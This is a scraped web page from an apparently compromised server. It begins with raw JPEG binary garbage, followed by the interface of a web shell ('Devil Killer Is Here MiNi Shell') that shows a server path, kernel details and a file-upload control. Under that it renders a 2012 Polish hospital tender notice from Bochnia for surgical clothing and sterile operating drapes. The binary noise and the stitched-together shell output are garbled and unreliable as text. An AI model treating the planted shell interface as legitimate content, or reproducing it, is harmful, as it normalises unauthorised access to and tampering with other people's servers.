JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120118/16437-N-2012.html

<p class="kh_header"><b>Bochnia: Dostawa obłożenia pól operacyjnych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I)</b><br>
<b>Numer ogłoszenia: 16437 - 2012; data zamieszczenia: 18.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa obłożenia pól operacyjnych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa obłożenia pól operacyjnych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I) opisanych w sposób szczegółowy w załączniku  według pakietów:
Pakiet nr 1 - Odzież chirurgiczna
Pakiet nr 2 - Zestawy operacyjne i akcesoria sterylne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1a.	Zamawiający wymaga od Wykonawcy który złoży ofertę na jeden pakiet żeby w okresie ostatnich trzech lat przed upływem terminu składania ofert do postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; zrealizował min. trzy dostawy (każda) odpowiadające swoim przedmiotem i wartością brutto, dla:
Pakiet nr 1 - Ortopedia	 19 000,00 zł 
Pakiet nr 2 - MIKROSYSTEMY	  41 000,00 zł 
1b.	Wykonawca, który złoży ofertę na więcej niż jeden pakiet musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; zrealizował min. trzy dostawy (każda) odpowiadające swoim przedmiotem i wartością brutto (minimum) określoną dla najdroższego pakietu - określoną w wymaganiach Zamawiającego według zestawienia powyżej. 
Na przykład: 
1) jeżeli Wykonawca złoży ofertę na pakiet nr 1, 2 - powinien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował min. trzy dostawy (każda) odpowiadającą swoim przedmiotem i wartością brutto ( minimum) 41 000,00 zł (pakiet nr 2)
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę wykaz, o którym mowa w punkcie III.4.1) ppkt1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1).	Oświadczenie, że oferowane  wyroby spełniają  wymagania  zgodnie z Ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2010 nr 107 poz. 679) oraz że Wykonawca posiada dokumenty świadczące o dopuszczeniu wyrobu do obrotu w placówkach medycznych na terenie RP i zobowiązuje się okazać potwierdzone kserokopie odpowiednich dokumentów na każde żądanie,
2).	Karta katalogowa lub folder w j. polskim - ze zdjęciem/rysunkiem pozwalająca Zamawiającemu na stwierdzenie spełniania wymaganych parametrów - każda strona musi zostać opisana którego pakietu i pozycji dotyczy 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez  Wykonawcę
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg formuły: spełnia/ nie spełnia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. 
W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego 
i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego produktu,
b)	nazwy produktu przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
d)	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę cen jednostkowych preparatów objętych umową z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych, w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych. 
5.	W każdym czasie trwania umowy Wykonawca może dokonać obniżki cen jednostkowych. 
6.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji oferowanego produktu
b)	wygaśnięcia rejestracji oferowanego produktu
7.	Na potwierdzenie okoliczności, o których mowa w ust. 6 Wykonawca przedstawi pisemne zawiadomienie producenta.
8.	Wykonawca w sytuacji określonej w ust. 6, w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej pod rygorem nieważności. 
9.	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
10.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o tych okolicznościach</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul. Krakowska 31, 32-700 Bochnia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2012 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym pokój nr 11, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odzież chirurgiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	J.m.	Ilość
Czepek chirurgiczny damski o kroju furażerki wykonany w części bocznej z włókniny wiskozowej  pochłaniającej pot o gramaturze min.26g/m2, w części górnej z włókniny perforowanej i paroprzepuszczalnej o gramaturze min.26g/m2 z tyłu wiązany na troki. Pakowany w kartoniki. rozmiar XL - głębokość 19 - 20 cm	szt.	1200
Czepek chirurgiczny uniwersalny o kroju furażerki wykonany w części bocznej z włókniny wiskozowej  pochłaniającej pot o gramaturze min.26g/m2, w części górnej z włókniny perforowanej i paroprzepuszczalnej o gramaturze min. 26g/m2 z tyłu wiązany na troki. Pakowany w kartoniki. Rozmiar L - głębokość 13-15cm	szt.	600
Sterylny, wzmocniony fartuch chirurgiczny wykonany z włókniny bawełnopodobnej typu Spunlaced o gramaturze min. 67 g/m2. Rękaw zakończony elastycznym mankietem, wiązany na troki wykonany z tego samego materiału co fartuch łączony kartonikiem, umożliwiający aplikację fartucha zapewniającą zachowanie sterylności z tyłu i przodu (sterylne plecy) posiadający dodatkowe, nieprzemakalne wzmocnienia w przedniej części fartucha z nieprzemakalnej foli polietylenowej a na rękawach z min. 2 warstwowego, nieprzemakalnego laminatu. Bezpośrednio na fartuchu znajdują się oznaczenia o rozmiarze. Fartuch wyposażony w dwie ściereczki, owinięty w papier lub włókninę. RozmiarXL	szt.	768
Sterylny fartuch chirurgiczny wykonany z min. 3 warstwowej włókniny typu SMS o gramaturze min. 35 g/m2. Rękaw zakończony elastycznym mankietem, wiązany na troki łączony kartonikiem, umożliwiający aplikację fartucha zapewniającą zachowanie sterylności z tyłu i przodu (sterylne plecy). Fartuch wyposażony w dwie ściereczki, owinięty w papier lub włókninę. RozmiarXL	szt.	420
Maska chirurgiczna pełnobarierowa wykonana z trzech warstw włóknin, warstwa twarzowa nie posiadająca mikrowłosków oraz specjalnie wygładzana nie powodująca uczuleń, wyposażona w sztywnik zapewniający łatwe dopasowanie się maski do kształtu twarzy, wiązana na troki. Pakowana w kartoniki.	szt.	900
Uniwersalne spodnie chirurgiczne wykonane z perforowanej włókniny bawełnopodobnej o gramaturze min 50 g/m2, antystatycznej, niepylącej, oddychającej, przeznaczonej do stosowania przez personel medyczny na blokach operacyjnych. Spodnie ściągane tasiemką,  Kolor niebieski lub zielony. Rozmiar L	szt.	144
Uniwersalne spodnie chirurgiczne wykonane z perforowanej włókniny bawełnopodobnej o gramaturze min 50 g/m2, antystatycznej, niepylącej, oddychającej, przeznaczonej do stosowania przez personel medyczny na blokach operacyjnych. Spodnie ściągane tasiemką.  Kolor niebieski lub zielony RozmiarXL	szt.	192
Uniwersalna bluza chirurgiczna wykonana z perforowanej włókniny bawełnopodobnej o gramaturze min 50 g/m2, antystatycznej, niepylącej, oddychającej, przeznaczonej do stosowania przez personel medyczny na blokach operacyjnych. Bluza krótki rękaw,  dwie kieszenie boczne na dole bluzy. Kolor niebieski lub zielony Rozmiar L	szt.	144
Uniwersalna bluza chirurgiczna wykonana z perforowanej włókniny bawełnopodobnej o gramaturze min 50 g/m2, antystatycznej, niepylącej, oddychającej, przeznaczonej do stosowania przez personel medyczny na blokach operacyjnych. Bluza krótki rękaw,  dwie kieszenie boczne na dole bluzy. Kolor niebieski lub zielony RozmiarXL	szt.	192.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Zestawy operacyjne i akcesoria sterylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia	J.m.	Ilość
Uniwersalne obłożenie pola operacyjnego.Sterylny zestaw wykonany w części krytycznej z min trójwarstwowego ,chłonnego , wytrzymałego i nieprzemakalnego laminatu o gramaturze min. 70 g/ m. 1)serweta - ekran anestezjologiczny z taśmą samoprzylepną w środkowej części serwety o wym 150 cm x 200-240 cm - 1 szt . 2) serweta dolna z taśmą lepną i dodatkową warstwą chłonną o wym. 170-180 cm x 175-180 cm - 1 szt . 3) serwety boczne z dodatkową warstwą chłonną  i taśmą lepną na całej długości dłuższego boku o wym. 75 cm x 90-100 cm - 2 szt. 4) Osłona na stolik MAYO 78 - 80 cm x 140 -145 cm , wykonana z mocnej folii oraz warstwy chłonnej . Sposób założenia osłony ma umożliwiać aseptyczne nakrycie stolika . Do wykorzystania jako worek na odpady /najlepiej /czerwony - 1 szt. 5) serweta o wym. 150 cm x 180 - 200 cm /owinięcie obłożenia / może służyć jako przykrycie stolika narzędziowego - 1 szt. 6) ręczniki chłonne - 4 szt. 7). Na opakowaniu powinien być TEST KONTROLNY z możliwością odklejenia min. 2 szt.	zestaw	265
Sterylny zestaw do artroskopii stawu kolanowego wykonany w części krytycznej z min. trójwarstwowego, chłonnego,wytrzymałego, nieprzemakalnego laminatu o gramaturze min.70 g/m. 
Minimalny skład i wymiary:
1) serweta główna 230 x 320cm wyposażona w samouszczelniający się otwór o średnicy 7cm, zintegrowana z workiem do zbierania płynów wyposażonym w samouszczelniajacy się otwór i podłączenie drenu- 1 szt.
2) serweta dodatkowa 150 x 190cm - 1 szt.
3) osłona na kończynę 22 x 75cm - 1 szt. 
4) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warswty chłonnej zabezpieczającej w całości blat stołu - 1 szt
5) samoprzylepna taśma włókninowa 9 x 49cm - 2 szt.
6) ściereczki chłonne - 4 szt
7) serweta na stół instrumentalny 150 x 190cm (owinięcie zestawu) - 1 szt	zestaw	215
Sterylny zestaw do operacji kończyny górnej wykonany w części krytycznej z min. dwuwarstwowego, chłonnego,wytrzymałego, nieprzemakalnego laminatu o gramaturze min.60 g/m. 
Minimalny skład i wymiary:
1) serweta główna 150/370 x 280cm z samouszczelniajacym sie otworem o średnicy 3,5cm - 1 szt.
2) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warswty chlonnej zabezpieczającej w całości blat stołu - 1 szt
3) serweta na stół instrumentalny 150 x 190cm (owinięcie zestawu) - 1 szt	zestaw	25
Sterylny zestaw do artroskopii stawu barkowego wykonany w części krytycznej z min. trójwarstwowego , chłonnego,wytrzymałego, nieprzemakalnego laminatu o gramaturze min.70 g/m. 
Minimalny skład i wymiary:
1) serweta górna 240 x 170cm z wycięciem w kształcie litery U 15 x 45cm otoczonym tasma samoprzylepną - 1 szt.
2) serweta dolna  230 x 295cm z wycięciem w kształcie litery U 10 x 70cm otoczonym tasma samoprzylepną - 1 szt.
3) osłona na kończynę 22 x 75cm - 1 szt. 
4) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warswty chlonnej zabezpieczającej w całości blat stołu - 1 szt
